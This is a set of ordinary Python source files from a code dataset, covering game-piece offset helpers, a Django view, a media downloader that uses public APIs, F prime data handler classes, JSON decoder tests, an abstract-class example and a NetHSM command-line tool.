@jit("int64[:, ::1](int64[:, ::1], unicode_type)", nopython=True)
def rotate_default_piece(offsets, orientation):
''' Description: Rotates the initial default piece orientation for shifting.
Parameters:
        offsets: numpy array of tuples indicating all corresponding offsets for a specific piece type
orientation: string indicating the orientation to rotate the offset pieces
Returns:
numpy list of all offsets for given orientation
'''
orientation_offsets_to_shift = np.zeros((len(offsets), 2), np.int64)
for index in range(len(offsets)):
if offsets[index][0] == 0 and offsets[index][1] == 0:
orientation_offsets_to_shift[index, :] = (0, 0)
else:
new_coord = rotate_piece((0, 0), offsets[index][0], offsets[index][1], orientation + "!") # adding dummy character to end since rotate ignores last character of orientation
orientation_offsets_to_shift[index, :] = (new_coord[0], new_coord[1])
return orientation_offsets_to_shift
@jit("int64[:, ::1](int64[:, ::1], int64)", nopython=True)
def shift_offsets(offsets, offset_id):
''' Description: Shifts the offsets so that the offset that corresponds to the offset_id is the new index
Parameters:
        offsets: numpy array of tuples containing the coords of offsets needing to be shifted
offset_id: identifies which coord becomes the new index in the list of offsets
Returns:
numpy array of tuples containing the newly shifted offsets
'''
shifted_offsets = np.zeros((len(offsets), 2), np.int64)
if offset_id == 0: # No need to shift the offsets for the default piece shape defined in the global space
return offsets
new_origin_y_diff = offsets[offset_id][0]
new_origin_x_diff = offsets[offset_id][1]
for index in range(len(offsets)):
shifted_offsets[index, :] = (offsets[index][0] - new_origin_y_diff, offsets[index][1] - new_origin_x_diff)
return shifted_offsets
@jit("int64[:, :, ::1](int64[:, ::1], unicode_type)", nopython=True)
def get_all_shifted_offsets(offsets, orientation):
''' Description: Compiles a list of all shifted offsets for a piece at a specific orientation.
Returns a numpy array, which is a list of a list of tuples which each contain
a shifted offset.
Parameters:
        offsets: numpy array of tuples containing the coords of offsets needing to be shifted
orientation: string specifying the orientation that the shifts should take place
Returns:
        list of all shifted offset sets the piece can take at the given orientation
'''
orientation_offsets_to_shift = rotate_default_piece(offsets, orientation)
shifted_offsets = np.zeros((len(offsets), len(orientation_offsets_to_shift), 2), np.int64)
for offset_id in range(len(orientation_offsets_to_shift)):
shifted_offsets[offset_id] = shift_offsets(orientation_offsets_to_shift, offset_id)
return shifted_offsets
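# Small self-check sketch showing how the helpers compose (illustrative). The piece
# offsets below are a made-up 3-cell line, and the trailing "0" on the orientation
# string passed to check_shifted assumes the caller appends a shift id character,
# as the comment in rotate_piece implies.
if __name__ == "__main__":
    piece_offsets = np.array([[0, 0], [0, 1], [0, 2]], np.int64)  # simple 3-cell line piece
    shifted = get_all_shifted_offsets(piece_offsets, "north")     # every shifted offset set, shape (3, 3, 2)
    board = np.zeros((20, 20), np.int64)                          # empty 20x20 board
    print(check_shifted(board, 1, (10, 10), "north0", shifted))   # ids of the shifts that fit at (10, 10)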
|
StarcoderdataPython
|
1615799
|
from django.contrib.auth.decorators import login_required
from django.utils.translation import ugettext as _
from questionnaire.views import generic_questionnaire_view_step
@login_required
def questionnaire_view_step(request, identifier, step):
"""
View rendering the form of a single step of a new Climate Change Adaptation
questionnaire in read-only mode.
"""
return generic_questionnaire_view_step(
request, identifier, step, 'cca',
page_title=_('Climate Change Adaptation'))
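# A minimal urls.py sketch for wiring this view up (illustrative only; the project's
# actual URL patterns and names are not shown here):
#   from django.conf.urls import url
#   from .views import questionnaire_view_step
#
#   urlpatterns = [
#       url(r'^view/(?P<identifier>[^/]+)/(?P<step>[^/]+)/$',
#           questionnaire_view_step, name='questionnaire_view_step'),
#   ]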
|
StarcoderdataPython
|
3321529
|
"""
Stepper configuration for verbose output
"""
debuglevel = 1 # 1: print HTTP headers, 0: don't print
show_page = True
|
StarcoderdataPython
|
4823092
|
import math
import random
import time
import subprocess
from datetime import datetime, timedelta
import freesound
import giphy_client
import requests
from giphy_client.rest import ApiException
from googleapiclient.discovery import build
from pafy import pafy
from pixabay import Image
from tqdm import tqdm
import config
import utils
logger = config.set_logger('Downloaders.py')
def store(litter_id, url, type):
logger.info('Storing media...')
end_point = config.BASE_URL + '/content/'
task = {
'litter_id': litter_id,
'url': url,
'type': type,
}
return requests.post(end_point, json=task, auth=config.AUTH)
def downloader(url, download_path):
logger.info('Inside downloader...')
r = requests.get(url, stream=True)
logger.info('status_code: ' + str(r.status_code))
logger.info('reason: ' + str(r.reason))
total_size = int(r.headers.get('content-length', 0))
block_size = 1024
    total_bytes = math.ceil(total_size / block_size)  # true division so the final partial block is counted
progress = 0
with open(download_path, 'wb') as f:
for data in tqdm(r.iter_content(block_size), total=total_bytes, unit='B'):
f.write(data)
progress += 1
percent_downloaded = round((progress / total_bytes) * 100)
if config.GLOBAL_DOWNLOAD_TRACKER != percent_downloaded:
if percent_downloaded > 100:
config.GLOBAL_DOWNLOAD_TRACKER = 100
else:
config.GLOBAL_DOWNLOAD_TRACKER = percent_downloaded
task = {'download': config.GLOBAL_DOWNLOAD_TRACKER}
utils.update_script(task)
time.sleep(.1)
f.close()
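# Usage sketch (illustrative; mirrors how the downloader classes below invoke this via runp):
#   downloader('https://example.com/photo.jpg', config.PIC_PATH + '0.jpg')
# Progress is mirrored to the remote script through config.GLOBAL_DOWNLOAD_TRACKER and utils.update_script.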
def generate_interval(video, duration):
logger.info('Generating interval')
cuts = [3, 5, 7, 10, 12]
start_minute = random.randint(0, duration.minute - 1)
start_second = random.randint(0, 59)
interval = random.choice(cuts)
return valid_interval(video.title, duration, start_minute, start_second, interval)
def valid_interval(title, duration, minute, second, interval):
logger.info('Validating interval...')
time_string = '0:' + str(minute) + ':' + str(second)
start = datetime.strptime(time_string, '%H:%M:%S')
end = start + timedelta(0, interval)
if end > duration:
end = start - timedelta(0, interval)
return title, end.strftime('%H:%M:%S'), start.strftime('%H:%M:%S')
else:
return title, start.strftime('%H:%M:%S'), end.strftime('%H:%M:%S')
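# Worked example (illustrative): for a 5-minute video, minute=4, second=30 and a 7-second
# cut, the end time 00:04:37 is still before 00:05:00, so the interval is returned in order:
#   valid_interval('clip', datetime.strptime('0:5:0', '%H:%M:%S'), 4, 30, 7)
#   -> ('clip', '00:04:30', '00:04:37')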
def download_handler(total_bytes_in_stream, total_bytes_downloaded, ratio_downloaded, download_rate, eta):
percent_downloaded = round(int(ratio_downloaded * 100))
if config.GLOBAL_DOWNLOAD_TRACKER != percent_downloaded:
config.GLOBAL_DOWNLOAD_TRACKER = percent_downloaded
task = {'download': percent_downloaded}
utils.update_script(task)
def download_video(video_id):
logger.info('Inside download_video...')
pafy.new(video_id).getbest(preftype='mp4')\
.download(config.VID_PATH, quiet=True, meta=True, callback=download_handler)
class VidDownloader(object):
def __init__(self, id, download_num):
self.download_num = download_num
self.interval_lst = []
self.id = id
self.tags = []
def download(self):
logger.info('Downloading videos...')
id_lst = self.get_vid_ids(self.download_num)
used = []
i = 0
while i < self.download_num:
index = random.randint(0, len(id_lst) - 1)
if index not in used:
used.append(index)
video_id = id_lst[index]['id']
video = pafy.new(video_id)
duration = datetime.strptime(video.duration, '%H:%M:%S')
if 20 > duration.minute > 0:
interval = generate_interval(video, duration)
logger.info('Interval: ' + str(interval))
self.interval_lst.append(interval)
cmd = ['runp', 'Downloaders.py', 'download_video:' + str(video_id)]
p = subprocess.Popen(cmd)
pid = utils.wait_timeout(p, config.DOWNLOAD_TIMEOUT)
if pid is not None:
logger.info('download_video ran successfully!')
store(self.id, 'https://www.youtube.com/watch?v=' + str(video.videoid), 'vid')
i += 1
else:
logger.info('download_video timed out!')
def get_vid_ids(self, download_num):
logger.info('Getting video ids...')
youtube = build(config.YOUTUBE_API_SERVICE_NAME, config.YOUTUBE_API_VERSION,
developerKey=config.YOUTUBE_API_KEY, cache_discovery=False)
id_lst = []
while len(id_lst) != (download_num * 5):
search = utils.generate_keyword()
search_response = youtube.search().list(q=search, part='id, snippet', type='video').execute()
for result in search_response.get('items', []):
video_id = {'id': result['id']['videoId']}
id_lst.append(video_id)
self.tags.append(search)
return id_lst
class GifDownloader(object):
def __init__(self, id, download_num):
self.download_num = download_num
self.id = id
self.tags = []
def download(self):
logger.info('Downloading gifs...')
api = giphy_client.DefaultApi()
limit = 50
offset = 0
rating = ['g', 'pg', 'pg-13']
lang = 'en'
fmt = 'json'
i = 0
while i < self.download_num:
search = utils.generate_keyword()
try:
response = api.stickers_search_get(config.GIPHY_API_KEY, search, limit=limit, offset=offset,
rating=rating[random.randint(0, 2)], lang=lang, fmt=fmt)
response_count = len(response.data)
if response_count:
index = random.randint(0, response_count - 1)
url = response.data[index].images.original.url
gif_path = config.GIF_PATH + str(i) + '.gif'
args = ','.join("{0}".format(arg) for arg in [url, gif_path])
cmd = ['runp', 'Downloaders.py', 'downloader:' + args]
p = subprocess.Popen(cmd)
pid = utils.wait_timeout(p, config.DOWNLOAD_TIMEOUT)
if pid is not None:
logger.info('Gif downloader ran successfully!')
store(self.id, url, 'gif')
self.tags.append(search)
i += 1
else:
logger.info('Gif downloader timed out!')
except ApiException as e:
logger.error("Exception when calling DefaultApi->stickers_random_get: %s\n" % e)
class PicDownloader(object):
def __init__(self, id, download_num):
self.download_num = download_num
self.id = id
self.tags = []
def download(self):
logger.info('Downloading pics...')
pix = Image(config.PIXABAY_API_KEY)
i = 0
while i < self.download_num:
search = utils.generate_keyword()
img_search = pix.search(q=search, page=1, per_page=30)
hits = len(img_search['hits'])
if hits:
index = random.randint(0, hits - 1)
url = img_search['hits'][index]['webformatURL']
pic_path = config.PIC_PATH + str(i) + '.jpg'
args = ','.join("{0}".format(arg) for arg in [url, pic_path])
cmd = ['runp', 'Downloaders.py', 'downloader:' + args]
p = subprocess.Popen(cmd)
pid = utils.wait_timeout(p, config.DOWNLOAD_TIMEOUT)
if pid is not None:
logger.info('Picture downloader ran successfully!')
store(self.id, url, 'pic')
self.tags.append(search)
i += 1
else:
utils.clear_file(pic_path)
                    logger.info('Picture downloader timed out!')
class SfxDownloader(object):
def __init__(self, id, download_num):
self.id = id
self.tags = []
self.download_num = download_num
def download(self):
logger.info('Downloading sfx...')
client = freesound.FreesoundClient()
client.set_token(config.FREESOUND_API_KEY)
i = 0
while i < int(self.download_num):
try:
sound_id = random.randint(0, 96451)
response = client.get_sound(sound_id)
url = response.url
args = ','.join("{0}".format(arg) for arg in [str(sound_id), str(i)])
cmd = ['runp', 'Downloaders.py', 'download_sfx:' + args]
p = subprocess.Popen(cmd)
pid = utils.wait_timeout(p, config.DOWNLOAD_TIMEOUT)
if pid is not None:
logger.info('download_sfx successfully ran...')
store(self.id, url, 'sfx')
i += 1
else:
logger.error('download_sfx function has timed out...')
except Exception as e:
                logger.error('Exception occurred while downloading sfx...')
logger.error(e)
# TODO search by randomly generated word
def download_sfx(sound_id, counter):
logger.info('Inside download_sfx...')
client = freesound.FreesoundClient()
client.set_token(config.FREESOUND_API_KEY)
response = client.get_sound(sound_id)
name = str(counter) + '.mp3'
response.retrieve_preview(config.SFX_PATH, name=name)
|
StarcoderdataPython
|
1689165
|
"""
handlers.py:
Defines a set of base classes that allow for the system to handle various functions of the system. Primarily this
defines the "DataHandler" base class for handling data.
@author mstarch
"""
import abc
class DataHandler(abc.ABC):
"""
Defines the necessary functions required to handle data as part of the F prime project. This allows any implementor
to be used to handle data.
"""
@abc.abstractmethod
def data_callback(self, data, sender=None):
"""
Callback function used to handle data being produced elsewhere in the system and processed by the given object.
Data supplied should be of a known type for the given object, and sender is an id of the sender. If not supplied
sender will be None.
:param data: data to be handled by this class
:param sender: (optional) id of sender, otherwise None
"""
class HandlerRegistrar(abc.ABC):
"""
Defines a class that will take in registrants and remember them for calling back later. These objects should be of
the type "DataHandler" as this handler will send data back to these handlers when asked to do so.
"""
def __init__(self):
"""
Constructor defining the internal lists needed to store the registrants.
"""
super().__init__()
self._registrants = []
def register(self, registrant):
"""
Register a registrant with this registrar. Will be stored and called back when asked to send data to all the
handlers registered.
:param registrant: handler to register
"""
if not isinstance(registrant, DataHandler):
raise ValueError("Cannot register non data handler")
self._registrants.append(registrant)
def deregister(self, registrant):
"""
Remove a registrant from the registrar such that it will not be called back later. Note: ignores invalid
removals by trapping the error, as the desired effect is already satisfied.
:param registrant: registrant to remove
:return: True if found, False if not. May safely be ignored.
"""
try:
self._registrants.remove(registrant)
return True
except ValueError:
return False
def send_to_all(self, data, sender=None):
"""
Sends the given data to all registrants.
:param data: data to send back to registrants
:param sender: (optional) sender to pass to data_callback
"""
for registrant in self._registrants:
registrant.data_callback(data, sender)
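# Minimal usage sketch (illustrative): a tiny concrete handler registered on a registrar
# and driven through send_to_all. The names below are examples, not part of the API.
if __name__ == "__main__":
    class PrintingHandler(DataHandler):
        """Concrete handler that simply prints whatever it receives."""
        def data_callback(self, data, sender=None):
            print(f"Got {data!r} from sender {sender}")

    registrar = HandlerRegistrar()  # has no abstract methods of its own, so it can be used directly
    registrar.register(PrintingHandler())
    registrar.send_to_all("hello", sender=42)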
|
StarcoderdataPython
|
3389933
|
import json
from jsonschema import Draft4Validator as Validator
import pytest
from jupyterlab_sql.request_decoder import decode, RequestDecodeError
test_schema = {
"type": "object",
"properties": {"prop": {"type": "string"}},
"required": ["prop"],
}
test_body = {"prop": "value"}
def test_decode_not_json():
body = "not-json"
with pytest.raises(RequestDecodeError):
decode(body, None)
def test_decode_incorrect_json():
body = json.dumps({"invalid": "json"})
validator = Validator(test_schema)
with pytest.raises(RequestDecodeError):
decode(body, validator)
def test_decode():
body_str = json.dumps(test_body)
validator = Validator(test_schema)
data = decode(body_str, validator)
assert data == test_body
|
StarcoderdataPython
|
1705787
|
#Here we'll use the abc module (Abstract Base Classes)
import abc
class Pessoa(abc.ABC):
@abc.abstractmethod
def get_bonificacao(self):
pass
class Conta(abc.ABC):
def __init__(self, numero, titular, saldo=0, limite=1000.0):
self._numero = numero
self._titular = titular
self._saldo = saldo
self._limite = limite
@abc.abstractmethod
def atualiza(self):
pass
@abc.abstractmethod
def imprimir_titular(self):
print(self._numero)
print(self._titular)
print(self._saldo)
print(self._limite)
pass
class PJ(Conta):
    def __init__(self, numero, titular, saldo=0, limite=1000.0):
        super().__init__(numero, titular, saldo, limite)  # forward the real values instead of hardcoding defaults
    def atualiza(self):
        pass  # concrete override required so PJ can be instantiated; the update rule is not specified here
    def imprimir_titular(self):
        super().imprimir_titular()
C = PJ("1435", "<NAME>")
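# Illustrative check of the abc enforcement: the abstract base cannot be instantiated,
# while the concrete subclass above can.
try:
    Conta("1", "Titular")
except TypeError as err:
    print("Conta is abstract:", err)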
|
StarcoderdataPython
|
3393723
|
# -*- coding: utf-8 -*-
#
# Copyright 2021 Nitrokey Developers
#
# Licensed under the Apache License, Version 2.0, <LICENSE-APACHE or
# http://apache.org/licenses/LICENSE-2.0> or the MIT license <LICENSE-MIT or
# http://opensource.org/licenses/MIT>, at your option. This file may not be
# copied, modified, or distributed except according to those terms.
import contextlib
import click
import pynitrokey.nethsm
@click.group()
@click.option(
"-h", "--host", "host", required=True, help="Set the host of the NetHSM API"
)
@click.option(
"-v",
"--api-version",
"version",
default="v1",
help="Set the version of the NetHSM API",
)
@click.option("-u", "--username", "username", help="The NetHSM user name")
@click.option("-p", "--password", "password", help="The NetHSM password")
@click.pass_context
def nethsm(ctx, host, version, username, password):
"""Interact with NetHSM, see subcommands."""
ctx.ensure_object(dict)
ctx.obj["NETHSM_HOST"] = host
ctx.obj["NETHSM_VERSION"] = version
ctx.obj["NETHSM_USERNAME"] = username
ctx.obj["NETHSM_PASSWORD"] = password
@contextlib.contextmanager
def connect(ctx, require_auth=True):
host = ctx.obj["NETHSM_HOST"]
version = ctx.obj["NETHSM_VERSION"]
username = None
password = None
if require_auth:
username = ctx.obj["NETHSM_USERNAME"]
password = ctx.obj["NETHSM_PASSWORD"]
if not username:
username = click.prompt(f"[auth] User name for NetHSM {host}")
if not password:
password = click.prompt(
f"[auth] Password for user {username} on NetHSM {host}", hide_input=True
)
with pynitrokey.nethsm.connect(host, version, username, password) as nethsm:
try:
yield nethsm
except pynitrokey.nethsm.NetHSMError as e:
raise click.ClickException(e)
@nethsm.command()
@click.argument("passphrase", required=False)
@click.pass_context
def unlock(ctx, passphrase):
"""Bring a locked NetHSM into operational state."""
with connect(ctx, require_auth=False) as nethsm:
if not passphrase:
passphrase = click.prompt(
f"Unlock passphrase for NetHSM {nethsm.host}", hide_input=True
)
nethsm.unlock(passphrase)
print(f"NetHSM {nethsm.host} unlocked")
@nethsm.command()
@click.pass_context
def lock(ctx):
"""Bring an operational NetHSM into locked state.
This command requires authentication as a user with the Administrator
role."""
with connect(ctx) as nethsm:
nethsm.lock()
print(f"NetHSM {nethsm.host} locked")
|
StarcoderdataPython
|